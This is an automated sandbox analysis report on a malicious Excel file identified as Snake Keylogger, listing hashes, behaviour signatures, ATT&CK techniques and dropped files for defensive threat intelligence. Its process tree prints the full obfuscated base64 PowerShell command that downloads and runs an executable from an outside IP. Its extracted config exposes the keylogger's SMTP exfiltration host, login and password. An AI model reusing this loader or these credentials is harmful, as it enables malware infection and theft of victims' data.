snakekeylogger | e7163358d7945ac9fa343eb49725d8ce1021993347178b1f5725e4689fd35059

Analysis

max time kernel
148s
max time network
149s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
04-10-2024 08:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TTXAPPLICATION.xls
Size

1.0MB
MD5

a88d8222f0c50bf06a91b3a9567c3306
SHA1

eb6afe8b34c4fd7c15104630e6a666322ba7420f
SHA256

e7163358d7945ac9fa343eb49725d8ce1021993347178b1f5725e4689fd35059
SHA512

0db10f1be93c95dda95425cff166e5ef87e3db6daa8f1ca882dd97a5a8f9bde893a3586bdd0a2ceeb744bd8d5c70b2c2a5c3388a1fe193a1d9501c76c8569259
SSDEEP

12288:xmzHJEHAfwu4hqD3DERnLRmF8DfPrf173d2FuLg70Je/mAI98dvj54002UZlAZ:gLw/hqbARM83V3uaGjS000

Score

10^/10

snakekeylogger collection defense_evasion discovery execution keylogger stealer

Malware Config

Extracted

Family

snakekeylogger

Credentials

Protocol: smtp
Host:
mail.teilecar.com
Port:
587
Username:
[email protected]
Password:
Manta924porsche=911
Email To:
[email protected]

Signatures

Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger

Snake Keylogger payload 3 IoCs

resource	yara_rule
behavioral1/memory/2340-66-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger
behavioral1/memory/2340-68-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger
behavioral1/memory/2340-67-0x0000000000400000-0x0000000000426000-memory.dmp	family_snakekeylogger

Blocklisted process makes network request 3 IoCs

flow	pid	Process
12	1960	mshta.exe
13	1960	mshta.exe
15	948	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
948	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2908	taskhostw.exe

Loads dropped DLL 1 IoCs

pid	Process
948	powershell.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key opened	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe
Key opened	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	checkip.dyndns.org

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0006000000019c3c-62.dat	autoit_exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2908 set thread context of 2340	2908	taskhostw.exe	38

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhostw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1760	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
948	powershell.exe
948	powershell.exe
948	powershell.exe
2340	RegSvcs.exe
2340	RegSvcs.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2908	taskhostw.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	948	powershell.exe
Token: SeDebugPrivilege	2340	RegSvcs.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
1760	EXCEL.EXE
1760	EXCEL.EXE
1760	EXCEL.EXE
1760	EXCEL.EXE
1760	EXCEL.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 1960 wrote to memory of 2088	1960	mshta.exe	31
PID 1960 wrote to memory of 2088	1960	mshta.exe	31
PID 1960 wrote to memory of 2088	1960	mshta.exe	31
PID 1960 wrote to memory of 2088	1960	mshta.exe	31
PID 2088 wrote to memory of 948	2088	cmd.exe	33
PID 2088 wrote to memory of 948	2088	cmd.exe	33
PID 2088 wrote to memory of 948	2088	cmd.exe	33
PID 2088 wrote to memory of 948	2088	cmd.exe	33
PID 948 wrote to memory of 2680	948	powershell.exe	35
PID 948 wrote to memory of 2680	948	powershell.exe	35
PID 948 wrote to memory of 2680	948	powershell.exe	35
PID 948 wrote to memory of 2680	948	powershell.exe	35
PID 2680 wrote to memory of 2528	2680	csc.exe	36
PID 2680 wrote to memory of 2528	2680	csc.exe	36
PID 2680 wrote to memory of 2528	2680	csc.exe	36
PID 2680 wrote to memory of 2528	2680	csc.exe	36
PID 948 wrote to memory of 2908	948	powershell.exe	37
PID 948 wrote to memory of 2908	948	powershell.exe	37
PID 948 wrote to memory of 2908	948	powershell.exe	37
PID 948 wrote to memory of 2908	948	powershell.exe	37
PID 2908 wrote to memory of 2340	2908	taskhostw.exe	38
PID 2908 wrote to memory of 2340	2908	taskhostw.exe	38
PID 2908 wrote to memory of 2340	2908	taskhostw.exe	38
PID 2908 wrote to memory of 2340	2908	taskhostw.exe	38
PID 2908 wrote to memory of 2340	2908	taskhostw.exe	38
PID 2908 wrote to memory of 2340	2908	taskhostw.exe	38
PID 2908 wrote to memory of 2340	2908	taskhostw.exe	38
PID 2908 wrote to memory of 2340	2908	taskhostw.exe	38

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegSvcs.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\TTXAPPLICATION.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1760

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1960
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C POWeRSHELL -Ex BYPass -NOP -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGJCbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6Q3JWQ1p0aCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTW5UT3EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRXNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUFnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxSGllTTduOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNi8yODAvdGFza2hvc3R3LmV4ZSIsIiRFbnY6QVBQREFUQVx0YXNraG9zdHcuZXhlIiwwLDApO1NUQVJULXNMRWVwKDMpO3NUYVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx0YXNraG9zdHcuZXhlIg=='+[cHAR]34+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2088
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    POWeRSHELL -Ex BYPass -NOP -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGJCbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6Q3JWQ1p0aCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTW5UT3EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRXNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUFnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxSGllTTduOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNi8yODAvdGFza2hvc3R3LmV4ZSIsIiRFbnY6QVBQREFUQVx0YXNraG9zdHcuZXhlIiwwLDApO1NUQVJULXNMRWVwKDMpO3NUYVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx0YXNraG9zdHcuZXhlIg=='+[cHAR]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - Loads dropped DLL
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:948
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\_gualngs.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2680
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC0E0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC0DF.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2528
  - - C:\Users\Admin\AppData\Roaming\taskhostw.exe
      "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: MapViewOfSection
      Suspicious use of WriteProcessMemory
      PID:2908
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
        5⤵
        Accesses Microsoft Outlook profiles
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:2340

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\84E5DB7D6CF82B1C16085F0DF3A4BCE7

Filesize
504B

MD5
e83da614a56b0d687459c7c66d655508

SHA1
9c56d105eeca4ed833ad1ac85bfdc983467619f4

SHA256
0dfb3e8bfcaf61c58859eb1ff31961a591332aeda11fe6df64612fbd039872e4

SHA512
97cb55d600c3693c68757d81340c2cb95ee298faeefec384ebfc7a6c76c7f98acce07556d488502e2f7d71aee5d5b43d6a9dc93ba97331d8133263bf59417fc8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
dc3b73b50e283ed5b113286600e9ac91

SHA1
662760d89651fbe5272965796871efb0f3d5dead

SHA256
f86b65e28b042b506cc8a5b3d3ab983fd5c022838f917ac28e45d7cceada797d

SHA512
80a9f6fe61dcd0fd387f9c331d12e11e06faf322f67f322d79524fe4c5a4903668f5d814408afc798168b2e4942bdfba89291d7cb10cb26b0b91b653f783e1ba

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\84E5DB7D6CF82B1C16085F0DF3A4BCE7

Filesize
546B

MD5
dbadbcad0f8db263f207cbace55b56f6

SHA1
8d1bf680416915b74a8af780a9815c3058638f16

SHA256
4f23bd6bc7ebb65d17c80cc988c569f7fc0b7ccbffbf572cc9f11a2cb51a80c9

SHA512
81b180b94f142a0532eb0f55e2d90c82c46ae9c297563c1846d789f830143b6a27af33853012a9406c6f49d349309ec28e0f96bc46567ad5e30aa43e5d2bb839

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
75087e364dd243d00ee8317cab86a9c3

SHA1
4470ee4015e035eef3f55d0a554a61f33a818c16

SHA256
1c6cd624c512878b289f447fc991b861aaf7a5fd9b5d9b44b60ce86494997b0e

SHA512
c1dc2fd7e0852af67e193ec264134a4abb2c972c7507d5708f046e2a63c76be03f7c039a8b5b436cff2c4aea1ac8815760e826bfb0f0ae760b6080f4755e902c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\40WV1DY9\newserviceupdation[1].hta

Filesize
8KB

MD5
cf19efb65170759203405e46dc871d97

SHA1
56f7b49dfeec086c3ab3a3a3dff1812beea8334b

SHA256
6670374e84ce7f4c5fd02ee4d31e9f268d636658d38dbcea813967c6431fc0fe

SHA512
1c2a7f1151cb70882d6aff7dfc02eae0c5504ca213672c6044af82d2444b5520e8a4263cd4c06dabcbedd9fcc1ade4d37bc2e0a5b6dd4af2d02734bdc07773a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabBAC7.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC0E0.tmp

Filesize
1KB

MD5
b1f68bb9472fcc541cb2f3b28f311d47

SHA1
f1fb0849268fe4239d2faaadd5e578c4489279cb

SHA256
35b3990f89ccd8f85ebd705a17de8fcdf6ea906c23347feb33687446ccd67305

SHA512
5f23481823079b351b0ca4a781e6b03e04c32df83ff1517c741ac20683994807a0dde61d39402142f69657282d4923be56bdacb879c2575a90fd6fa328ce8ba7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_gualngs.dll

Filesize
3KB

MD5
f8611336fe40fa4faeeaaf74317c91b0

SHA1
e5727b900273296c1b0e6eacb9cda602187c9739

SHA256
dfdf9bac096694016e71f2824c3fd5f9e5bf20db28c5fb5a4afd75f0ae550152

SHA512
fbbe2ac5ff5890329b07f490f66f50d28455bf765b11db25359ada91a6a9c0fbbf9939e0ee2cbc07673e7d5ab78de22751ed114214e47ff375b111253842a2d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_gualngs.pdb

Filesize
7KB

MD5
7f740c548488f064f5c4148daa74568b

SHA1
2af4091f132e93d0e1eee1355c569415aef0d300

SHA256
1aad576e523d9a904f7f65c7d0b69b8f3ceb80a0c61062a29ee58acc1ff5fe76

SHA512
e603501aba72592425bae9a15586f578d0aad247547304d4b8410ed2624581a0c9b2a81fed381bae527bac950302ccc992cbc199e60545923e17febb4287aa2f

Download Submit
C:\Users\Admin\AppData\Roaming\taskhostw.exe

Filesize
941KB

MD5
3573191164a6938ae79c1d2aba8a38fa

SHA1
3a1c2a7669055d470c0918ed1b441387ea5e940d

SHA256
efe22938d34401515a5820f9bc7982921f42a65bd2ed9a9f2ef6dfda534e2500

SHA512
3c768db1f33a0c38aa73ba2d7db1c044ae089fc4a1bfdcc22032b2b65f8b3532b68991adcf0cdb6b07c00a61f8f1ecf26c0c1e95169ce15ce62aa3a87b9121f6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCC0DF.tmp

Filesize
652B

MD5
a4089281448d0ee574fb520fc758c148

SHA1
0bd6acbf331039cbc60d5173665d5646237586eb

SHA256
f8e97afc260ac6bc136948ed9a30a1edc76788d8de86676c9a6ea6439d2b1f79

SHA512
dc32a1727343c8beae3dd932e9f3600f83bea17eaae621f1d5992dcceb5d4fe61b8b19d8b3e3721b4036aac000f67826192004a4ab41e93e36d0557f4bb75132

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\_gualngs.0.cs

Filesize
481B

MD5
7a5c1e0b06cc6f06cecbd9bc851739e0

SHA1
69fbe90e70a9cebb5a9af8afdabbfc72c6bc679a

SHA256
81ea592f9c853de03314de17a3b8d1533a08013f295333ffe60b9e4bdc9872c1

SHA512
166e754b88d9a7c505ba816beea8934c181895006d993c5ccba159c5f1b8d1fe0fa9fa0f756b080a85ee42079b285fc20bff21ab5aa5c7a3ebc8359e5bc50f3f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\_gualngs.cmdline

Filesize
309B

MD5
93dcefbeff07dfeacccb0f397140e5c8

SHA1
b33a698a885d960655b891323ccd409550abce83

SHA256
457248df82b4f340003bd75919f327010473c22b96ee2084fea17f32169596a0

SHA512
8936059bdc84113509f4386be1603930f511996c925e8d0bc4f0af12d46530d6f47fba922ae12874430a0f7531201b6f3d0a7a1096217f369e4ac816decb3ec0

Download Submit
memory/1760-1-0x000000007246D000-0x0000000072478000-memory.dmp

Filesize
44KB

Download
memory/1760-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1760-19-0x00000000024F0000-0x00000000024F2000-memory.dmp

Filesize
8KB

Download
memory/1760-69-0x000000007246D000-0x0000000072478000-memory.dmp

Filesize
44KB

Download
memory/1960-18-0x0000000000E80000-0x0000000000E82000-memory.dmp

Filesize
8KB

Download
memory/2340-66-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/2340-68-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/2340-67-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download